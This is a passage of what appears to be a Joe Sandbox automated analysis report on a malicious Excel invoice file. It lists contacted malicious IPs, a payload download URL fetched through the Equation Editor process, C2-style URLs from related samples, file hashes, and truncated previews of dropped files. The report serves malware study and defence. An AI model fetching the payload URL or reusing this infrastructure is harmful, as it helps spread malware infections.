                                                http://computername/printers/printername/.printerexplorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                http://www.%s.comPAexplorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		low
                                                http://www.autoitscript.com/autoit3explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://support.mozilla.orgexplorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://servername/isapibackend.dllexplorer.exe, 00000007.00000000.1008792318.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      23.81.214.26
                                                      		www.yiwanggkm.comUnited States
                                                      		396190LEASEWEB-USA-SEA-10UStrue
                                                      34.102.136.180
                                                      		arjimni.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      198.54.117.212
                                                      		parkingpage.namecheap.comUnited States
                                                      		22612NAMECHEAP-NETUSfalse
                                                      104.168.33.31
                                                      		unknownUnited States
                                                      		36352AS-COLOCROSSINGUStrue
                                                      164.155.217.57
                                                      		www.tw-life.netSouth Africa
                                                      		26484IKGUL-26484UStrue

                                                      General Information

                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:626601
                                                      Start date and time: 14/05/202215:18:092022-05-14 15:18:09 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 10m 55s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:DL03327INV.xlsx
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.expl.evad.winXLSX@11/16@5/5
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 42.8% (good quality ratio 41.1%)
                                                      • Quality average: 75%
                                                      • Quality standard deviation: 28%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 118
                                                      • Number of non-executed functions: 62
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .xlsx
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      15:18:43API Interceptor102x Sleep call for process: EQNEDT32.EXE modified
                                                      15:18:57API Interceptor35x Sleep call for process: yldnat.exe modified
                                                      15:19:19API Interceptor208x Sleep call for process: wuapp.exe modified
                                                      15:20:04API Interceptor1x Sleep call for process: explorer.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      198.54.117.212Notificaci#U00f3n de pago.exeGet hashmaliciousBrowse
                                                      • www.evertribute.com/d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb
                                                      DHL Shipment doc.exeGet hashmaliciousBrowse
                                                      • www.jenaeeaginshair.com/h4st/?S0GPjB=q70XfpQZmlAB2auGq1hAkZwSf/NS/wp1Irfs0GTn4KVIkT9NIixf66nFmV9/9WE3amkk&WBZ89=7nHdAXGHjvCt
                                                      TyTasyWsK7.exeGet hashmaliciousBrowse
                                                      • www.mexicomakes.com/rx29/?v6AhC=MN6pkdshnX0P5&7nr=k5ydulq9kPFauAtXvUGEfm+Uw3krzuQ4zk6zyAvK/KFYX5MlPt6Zlf43oC2uvGdjiRwp78uJoA==
                                                      hJyWzS4AWx.exeGet hashmaliciousBrowse
                                                      • www.fliptheswitch.pro/arh2/?jBSH34H=T/WlQli/iOW99vugx1+QnTRsOFuzNIELOhX8iakrfqWoxVhOncDhQuop0wYTMOKLFMsk&zJ=tbAl28e0JZ
                                                      Docs advice copy.exeGet hashmaliciousBrowse
                                                      • www.wakechallenge.com/gt53/?sX=6pE3ju96WQK0+B5ULgyQSatX/FOaFjpxiDjz3RqOeHNV7XNVwIejoEIqabcy68HR6G0I&9rN0g=iZRXo
                                                      8aHgrjlJZX.exeGet hashmaliciousBrowse
                                                      • www.themastersmindinternational.net/b26k/?2dO83=023S549G5s7+49AjU60mm3bsBMFCFqgWpKNz3h7pkzB548FzE5lHxr+z5Qhpl82he0RD&6lJt0=fV74GZDPWxkXVl0P
                                                      Order-Invoice.xlsxGet hashmaliciousBrowse
                                                      • www.xmasshoppinglist.com/n6g4/?AN90=3fRxr0YPkX0X&4hP=lk1Ytgy5J4brT9zaTqBsrOyQYj13WzRH2814vK/rD7m77rdlYSBBfE0669SGmlpsTkybbA==
                                                      shedy.exeGet hashmaliciousBrowse
                                                      • www.stirredbythesea.com/rscu/?i6A=arxSzfx+vy09ymVDbp0Epd8jJd3v6Kyn3ZWBqZhnCJdzZczZyGypOb/Ffi3DmoNTXddL&_L04=DBZX-ZDHenAT
                                                      Invoice.xlsxGet hashmaliciousBrowse
                                                      • www.backgammondestinations.net/grh2/?5j=saa8PMbNBjJbbZ+5JbPWtFeepLhSMVnKDuIDi4YjDbFx6SC3hMpc2U1V4hUA4JY6D+3V1w==&Jtxhc=Q6TdP0BHU
                                                      Att#1 Price Schedule Piping Blasting & Painting Works.exeGet hashmaliciousBrowse
                                                      • www.datashen.com/m3ci/?P6MpQr=3fZxO8l8KfdxY&A6Eh0NIX=IK5OCHgBJEmbaHMkAAXzhCR4GjUUUUmjfl7IzxUaHJbHTPnaMaSNGqiN8WYWgIpKB17S
                                                      Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                      • www.popcornpor.xyz/j86w/?B6Y0=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGg3SgtsHi0+h&6l3=7nJpZxY0EPl0
                                                      SecuriteInfo.com.Variant.MSILHeracles.26442.6256.exeGet hashmaliciousBrowse
                                                      • www.asla-startrans.com/vmqm/?XdyT6=+EEgIBo2TvWWXNzyvuMfn5+Z7EtEbRmFCmkQ0AMAvXSsdH0obtQwD6bjpg7FAm2p0DAs&p67=q8kPXdH0Dlg
                                                      SOA.exeGet hashmaliciousBrowse
                                                      • www.xpressporn.com/3e9r/?Yf9D0lTh=FQdCPUjhXotQoJ4CKAJtfTWZByK+Ojq+iU8IovunNytQ5TMwAp07fKSIvwuA9ysCmDpq&u0Dl=Q4CDzbR0oNK4Ej6
                                                      SecuriteInfo.com.W32.AIDetectNet.01.26901.exeGet hashmaliciousBrowse
                                                      • www.whoreal.net/ahge/?3fBt7b-=QXqSep6ezCFu2G/MW+1Tdu7nu5PwS3oIzH2xWGXsUC7w6nIkdzZdA1SYR8s134ZRgM+iOr0q0g==&e6BL=HFQDdRSP8d
                                                      CHECKLIST2200030 NEW ORDER.PDF.exeGet hashmaliciousBrowse
                                                      • www.dec2005.xyz/g5so/?x6TXzDm=pd9eJYIiKEbx0YgrSOb1By14PZFH7gzgIWi0B/tVurCGPmd3qIAYQPrLIm4ze8RM5paj&khZ4k4=7nwTY
                                                      DHL.exeGet hashmaliciousBrowse
                                                      • www.starcycleglobal.com/a5qd/?JRTXBj=Oa2nZ+2xQG4CaRxNsyIIV+X5yWhkVEnxgErb9O844iygrnkmNvzo/FIaL1UiU28mLXL5&w0GP1=HL08TPDH
                                                      FATURA_S.EXEGet hashmaliciousBrowse
                                                      • www.plainfiles.com/i9ng/?4h=xakOuhDZ+Q5WbrWmVfk4f14ggHG82eXsEmObW4kHQE6LOYZQmZ/WUk6edJZSdGWs57QC&k6A=_ZsLEbjxGHsx
                                                      Anfrage Angebot RESALE DE Maschinen Interesse Nummer 6654229005678.exeGet hashmaliciousBrowse
                                                      • www.terrierslovjt.xyz/g6k0/?oT=Hip7CMimOk78gxL5CMPku07nV6Z0o8C0cGWx1eP+ie71BFDKkLr5JgybhXBrWtyrNdPh&vDKd7h=9rjLcdHx-0r
                                                      dekonthtml.exeGet hashmaliciousBrowse
                                                      • www.vacationdealscorp.website/d23n/?x0GLp6V=KF+jwyrZjKxB+2jH5URL+2UV/SD9Gc2YiyRDMrhBOt4TPBFezS+MdmZvHXWfs4XBNCOG&WBg4=5jK4EL4PkLqXtt
                                                      Vjw.exeGet hashmaliciousBrowse
                                                      • www.abcam-global.com/agsj/?S4m=pZukCCpOlxBbeyZwubQhJMgZkI30amTvWY4n5TjO0OxYnGUCit5uPOkfjWsqaaskQ47N&1b=6lL07rrpgL7Hsz

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      parkingpage.namecheap.cominlaww321345.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      Notificaci#U00f3n de pago.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      Advice FTT5378393.exeGet hashmaliciousBrowse
                                                      • 198.54.117.211
                                                      Reference Note PJS-4010036-Ref 18976.exeGet hashmaliciousBrowse
                                                      • 198.54.117.211
                                                      Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                      • 198.54.117.215
                                                      SecuriteInfo.com.Variant.Jaik.72878.8629.exeGet hashmaliciousBrowse
                                                      • 198.54.117.217
                                                      ORDERS_S.EXEGet hashmaliciousBrowse
                                                      • 198.54.117.217
                                                      EMIRATE BANK SWIFT 12-05-2022.exeGet hashmaliciousBrowse
                                                      • 198.54.117.210
                                                      RewdsccVjn.exeGet hashmaliciousBrowse
                                                      • 198.54.117.218
                                                      2YoK0uIVmS.exeGet hashmaliciousBrowse
                                                      • 198.54.117.218
                                                      Energe 1,010.00.xlsxGet hashmaliciousBrowse
                                                      • 198.54.117.218
                                                      DHL Shipment doc.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      v444BZjqsC.exeGet hashmaliciousBrowse
                                                      • 198.54.117.210
                                                      jO7HOv839n.exeGet hashmaliciousBrowse
                                                      • 198.54.117.215
                                                      TyTasyWsK7.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      Comanda atasata.exeGet hashmaliciousBrowse
                                                      • 198.54.117.215
                                                      Enquiry 1331 SO 26929.exeGet hashmaliciousBrowse
                                                      • 198.54.117.217
                                                      ST10501909262401.exeGet hashmaliciousBrowse
                                                      • 198.54.117.210
                                                      bWFqrKmWuG.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      hJyWzS4AWx.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comdoc#011010022.exeGet hashmaliciousBrowse
                                                      • 18.119.154.66
                                                      New order_27.04.2022.pdf.exeGet hashmaliciousBrowse
                                                      • 3.140.13.188
                                                      LPGC CIPTA DIAMOND.xlsxGet hashmaliciousBrowse
                                                      • 18.119.154.66
                                                      SooS.xlsGet hashmaliciousBrowse
                                                      • 3.140.13.188
                                                      invoice.xlsGet hashmaliciousBrowse
                                                      • 3.140.13.188
                                                      doc88.exeGet hashmaliciousBrowse
                                                      • 18.119.154.66
                                                      ESY12042.EXEGet hashmaliciousBrowse
                                                      • 3.140.13.188
                                                      vbc.exeGet hashmaliciousBrowse
                                                      • 3.140.13.188
                                                      Protected copy of the commercial invoice.exeGet hashmaliciousBrowse
                                                      • 18.119.154.66
                                                      vp65TB0xq1rmUPA.exeGet hashmaliciousBrowse
                                                      • 18.119.154.66
                                                      IRQ2107797_pdf.exeGet hashmaliciousBrowse
                                                      • 18.119.154.66
                                                      New TST_SAM_16L SNAP WHITE.exeGet hashmaliciousBrowse
                                                      • 18.119.154.66
                                                      uEENSyTlon.exeGet hashmaliciousBrowse
                                                      • 18.119.154.66
                                                      ScannerHSBC202204.exeGet hashmaliciousBrowse
                                                      • 3.140.13.188
                                                      DHL SHIPMENT NOTIFICATION 284748395PD.exeGet hashmaliciousBrowse
                                                      • 18.119.154.66
                                                      revised PI876345678.xlsxGet hashmaliciousBrowse
                                                      • 3.140.13.188
                                                      mskl.exeGet hashmaliciousBrowse
                                                      • 18.119.154.66
                                                      lr1ytzKWGY.exeGet hashmaliciousBrowse
                                                      • 18.119.154.66
                                                      PO-768902839.xlsxGet hashmaliciousBrowse
                                                      • 3.140.13.188
                                                      SWIFT,pdf.exeGet hashmaliciousBrowse
                                                      • 18.119.154.66

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      LEASEWEB-USA-SEA-10USInquiry.doc05102022.exeGet hashmaliciousBrowse
                                                      • 142.234.236.174
                                                      sora.armGet hashmaliciousBrowse
                                                      • 172.241.159.251
                                                      cxFK87hhwMGet hashmaliciousBrowse
                                                      • 172.241.159.244
                                                      Like3EYCgSGet hashmaliciousBrowse
                                                      • 172.241.159.211
                                                      810gMVdxHVGet hashmaliciousBrowse
                                                      • 172.241.159.245
                                                      arm7Get hashmaliciousBrowse
                                                      • 23.82.230.162
                                                      UzFT5M5FXm.exeGet hashmaliciousBrowse
                                                      • 23.106.215.217
                                                      gymSqYK5w9Get hashmaliciousBrowse
                                                      • 172.241.159.252
                                                      joltvU7NHw.exeGet hashmaliciousBrowse
                                                      • 23.82.156.226
                                                      x86Get hashmaliciousBrowse
                                                      • 172.241.159.238
                                                      b72WXQwmB3Get hashmaliciousBrowse
                                                      • 23.19.223.195
                                                      xyjcT3XzpCGet hashmaliciousBrowse
                                                      • 172.241.159.225
                                                      M7NtYyxbey.exeGet hashmaliciousBrowse
                                                      • 23.106.223.243
                                                      armGet hashmaliciousBrowse
                                                      • 23.19.223.166
                                                      Service-Interrupt-1734251127.xlsbGet hashmaliciousBrowse
                                                      • 23.106.215.210
                                                      Service-Interrupt-1734251127.xlsbGet hashmaliciousBrowse
                                                      • 23.106.215.210
                                                      Service-Interrupt-947051958.xlsbGet hashmaliciousBrowse
                                                      • 23.106.215.210
                                                      Service-Interrupt-947051958.xlsbGet hashmaliciousBrowse
                                                      • 23.106.215.210
                                                      Zeus.mpslGet hashmaliciousBrowse
                                                      • 172.241.159.233
                                                      U prilogu je predracun.exeGet hashmaliciousBrowse
                                                      • 64.120.2.136
                                                      NAMECHEAP-NETUSShipment Documents.exeGet hashmaliciousBrowse
                                                      • 198.187.30.47
                                                      RFQ. 220 & Drawings.exeGet hashmaliciousBrowse
                                                      • 198.187.30.47
                                                      PI PDF.exeGet hashmaliciousBrowse
                                                      • 198.54.126.161
                                                      https://kryptokingtrading.com/webapp/data.phpGet hashmaliciousBrowse
                                                      • 68.65.120.231
                                                      https://fedgovapp.com/Maryland-login/Get hashmaliciousBrowse
                                                      • 198.54.114.219
                                                      http://15u30P6pz0M18W5vt.camGet hashmaliciousBrowse
                                                      • 162.255.119.176
                                                      Notificaci#U00f3n de pago.exeGet hashmaliciousBrowse
                                                      • 198.54.117.212
                                                      LISTA DE ESPECIFICACIONES PO A Y B CON HOJA DE DIBUJO 1,2 y 3.exeGet hashmaliciousBrowse
                                                      • 198.187.30.47
                                                      DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                                      • 198.187.30.47
                                                      Shipping Documents.exeGet hashmaliciousBrowse
                                                      • 198.187.30.47
                                                      Advice FTT5378393.exeGet hashmaliciousBrowse
                                                      • 162.0.233.154
                                                      http://jbhess.jbhess.africartz.com/amJoZXNzQGhlc3MuY29tGet hashmaliciousBrowse
                                                      • 199.188.205.217
                                                      SOA (2).exeGet hashmaliciousBrowse
                                                      • 198.54.126.161
                                                      http://jbhess.jbhess.africartz.com/amJoZXNzQGhlc3MuY29tGet hashmaliciousBrowse
                                                      • 199.188.205.217
                                                      https://nwfparolinv.org/Get hashmaliciousBrowse
                                                      • 68.65.123.205
                                                      Order.docGet hashmaliciousBrowse
                                                      • 162.0.233.154
                                                      SOA.exeGet hashmaliciousBrowse
                                                      • 198.54.126.161
                                                      http://wm8delihrf.purboposchim.online/#.aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtY3A0dDQ5Mm1GOGd5a3dUQ3NBbUJlREZ4ZWlTaG9lUWd5OTRWSE5pWnNIeTc/I3N5bHZpZS5kcmFwZWF1QHNhYXEuZ291di5xYy5jYQ==Get hashmaliciousBrowse
                                                      • 199.188.206.59
                                                      http://wm8delihrf.purboposchim.online/#.aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtY3A0dDQ5Mm1GOGd5a3dUQ3NBbUJlREZ4ZWlTaG9lUWd5OTRWSE5pWnNIeTc/I3N5bHZpZS5kcmFwZWF1QHNhYXEuZ291di5xYy5jYQ==Get hashmaliciousBrowse
                                                      • 199.188.206.59
                                                      SecuriteInfo.com.Variant.Jaik.72878.8629.exeGet hashmaliciousBrowse
                                                      • 198.54.117.217

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

                                                      Download File
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:downloaded
                                                      Size (bytes):263772
                                                      Entropy (8bit):7.907718436240332
                                                      Encrypted:false
                                                      SSDEEP:6144:LOtIO4ysWjl1zKay/DGHe9G78x3c4mfnk1OUgS:LOLSepKvCH78xM4mQOY
                                                      MD5:DE76EF6A11A63EFC00B0303888BC0B7F
                                                      SHA1:7AB24456A49F6B61BC54D20A4D9C0B84F3AE696B
                                                      SHA-256:FC6EBE8BC215A292BB3DF340A84350CEB2BE7187EFC8E10381235CFA8D82F734
                                                      SHA-512:51A5CF0F640D922EC0D8BF5BA3FCC06B6278E3AC45F07190710C5055A23102A614443641D8B6617775D5A786CCB1E9D10404DFA0E146E6C8EC3481C616214D99
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 51%
                                                      Reputation:low
                                                      IE Cache URL:http://104.168.33.31/75/vbc.exe
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\21AA51C5.wmf

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ms-windows metafont .wmf
                                                      Category:dropped
                                                      Size (bytes):4630
                                                      Entropy (8bit):5.070400845866794
                                                      Encrypted:false
                                                      SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                                      MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                                      SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                                      SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                                      SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5042D1B.wmf

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ms-windows metafont .wmf
                                                      Category:dropped
                                                      Size (bytes):4630
                                                      Entropy (8bit):5.070400845866794
                                                      Encrypted:false
                                                      SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                                      MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                                      SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                                      SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                                      SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52D20C60.wmf

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ms-windows metafont .wmf
                                                      Category:dropped
                                                      Size (bytes):1970
                                                      Entropy (8bit):5.125773446782967
                                                      Encrypted:false
                                                      SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                                      MD5:30935B0D56A69E2E57355F8033ADF98B
                                                      SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                                      SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                                      SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                                      Malicious:false
                                                      Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77AC4BD4.emf

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                      Category:dropped
                                                      Size (bytes):223752
                                                      Entropy (8bit):3.2805343869701504
                                                      Encrypted:false
                                                      SSDEEP:1536:gAGsM8yOYZWQ99d99H9999999lN6Hz8iiiiiiiiiiiiiiiPnHnbq+QVwtaKfdL4a:gMMVNSztnZft6rMMVNSztnZft6u
                                                      MD5:8E3A74F7AA420B02D34C69E625969C0A
                                                      SHA1:4743F57F0F702C5B47FA1668D9173E08ADA16448
                                                      SHA-256:0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
                                                      SHA-512:ADE6B91E260AFA08CC286471D0AD7BCA82FF5E1FE506D48B37A13E3CDD2717171CDAC38C77CFF18FD4C26CA9470B002B63B7FDDC0466FC6F7010A772BF557054
                                                      Malicious:false
                                                      Preview:....l................................... EMF.....j..........................8...X....................?......F...........GDIC...............p.........8.........................F...........................A. ...........F.......(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8E77A502.wmf

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      File Type:ms-windows metafont .wmf
                                                      Category:dropped
                                                      Size (bytes):1970
                                                      Entropy (8bit):5.125773446782967
                                                      Encrypted:false
                                                      SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                                      MD5:30935B0D56A69E2E57355F8033ADF98B
                                                      SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                                      SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                                      SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                                      Malicious:false
                                                      Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...

                                                      C:\Users\user\AppData\Local\Temp\boswagvgna

                                                      Download File
                                                      Process:C:\Users\Public\vbc.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5255
                                                      Entropy (8bit):6.127070531933686
                                                      Encrypted:false
                                                      SSDEEP:96:PtzobClet8oviJxTEJ7eusJIzyy+F4q0IqxeEoAe8oUEVsLA3wtPAJmr2DmX:JEueZvMly+iIqxeocsLA3wtPAJmr2DmX
                                                      MD5:D4AA661B180DF0D15BB6D0DC8342B8BA
                                                      SHA1:07310F7D0C29CD6A18AE1174578F61B08E2BA844
                                                      SHA-256:E12B146FD62913D6650FCAF490CF973008929E47FD247CB3BD75B6E854CFDD89
                                                      SHA-512:B423C31088CE987D77CCB2ECFB055674868DD34A995CCA1C5AFFF3CA6F2BFEA0C64037D68132C43735140651CD550507773012C23F142F04B3DE984FD4DAB39A
                                                      Malicious:false
